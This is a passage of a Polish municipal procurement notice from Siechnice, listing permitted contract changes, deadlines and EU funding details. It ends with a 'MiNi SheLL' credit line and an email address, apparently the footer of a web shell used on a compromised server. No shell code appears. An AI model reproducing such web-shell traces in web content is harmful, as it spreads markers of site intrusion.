<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której istotne postanowienia stanowi załącznik do niniejszej umowy. W zawiadomieniu o wyborze najkorzystniejszej oferty zostanie określony termin podpisania umowy.
2.Zamawiający dopuszcza nieistotne zmiany w umowie oraz inne zmiany postanowień zawartych w istotnych postanowieniach umowy, które Zamawiający przewidział w ogłoszeniu lub specyfikacji istotnych warunków zamówienia.
3. Zamawiający dopuszcza możliwość przerwania świadczenia prac nie z winy Wykonawcy, których nie można było przewidzieć lub którym skutkom nie można było zapobiec, pomimo dołożenia przez Wykonawcę najwyższej staranności (np.: klęska żywiołowa i inne). Zamawiający dopuszcza zmianę terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności.
4.Zamawiający dopuszcza możliwość zmiany sposobu rozliczania umowy lub dokonywania płatności.
5.Zamawiający dopuszcza możliwość zmiany stawki podatku VAT w przypadku zmiany przepisów dotyczących podatku VAT.
6.Zamawiający dopuszcza zmianę przedstawicieli stron umowy.
7.Zamawiający dopuszcza zmianę osób odpowiedzialnych bezpośrednio za realizację zamówienia, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowe osoby, w przypadku, gdy:
1)Wykonawca z własnej inicjatywy proponuje zmianę w następujących przypadkach:
a)śmierci, choroby lub innych zdarzeń losowych dotyczących tych osób,
b)nie wywiązywania się tych osób z obowiązków wynikających z umowy,
2)zmiana tych osób stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji),
3)zmiana tych osób stała się konieczna z jakichkolwiek przyczyn niezależnych.
8.Zamawiający może zażądać od wykonawcy zmiany osób odpowiedzialnych bezpośrednio za realizację zamówienia, jeżeli uzna, że nie wykonują one swoich obowiązków wynikających z umowy. Wykonawca zobowiązany jest zmienić te osoby zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie.
9.W przypadku zmiany którejkolwiek osoby odpowiedzialnej bezpośrednio za realizację zamówienia nowa osoba musi spełniać wymagania określone w SIWZ dla danego specjalisty.
10.Po otrzymaniu pisemnej prośby dot. zmiany którejkolwiek osoby odpowiedzialnej bezpośrednio za realizację zamówienia określonej w umowie, w terminie 14 dni od przekazania, Zamawiający może wyrazić zgodę na powyższe.
11.Dopuszcza się zmiany na skutek wydanych decyzji, uzgodnień, faktycznych uwarunkowań terenowych i gruntowych, powodujących konieczność modyfikacji rozwiązań, z zastrzeżeniem.
12.Innych sytuacji, których nie można było przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia procedury mającej na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tą procedurą.
13.Zamawiający dopuszcza zmianę terminu realizacji umowy lub poszczególnych jej części o czas trwania poniższych okoliczności, w przypadku: 
1)wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie,
2)konieczności wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub
3)opóźnień Zamawiającego w przekazaniu Wykonawcy dokumentów, do których przekazania Zamawiający był zobowiązany,
4)działania siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub
5)innych okoliczności nie powstałych z winy Wykonawcy lub
6)opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub
7)koniecznością wykonania zamówień dodatkowych lub
8)innymi okolicznościami nie powstałymi z winy Wykonawcy.
Uwaga:
Zamawiający dopuszcza zmianę terminu umowy w sytuacjach, które muszą być udokumentowane przez Wykonawcę w sposób jednoznaczny i nie budzący wątpliwości. 
14.Zamawiający dopuszcza zmianę podwykonawców realizujących poszczególne części zamówienia w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę. Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie szczegółowo poisanym w istotnych warunkach umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2014 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice, kancelaria - parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany w ramach działania 413 Wdrażanie lokalnych strategii rozwoju PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com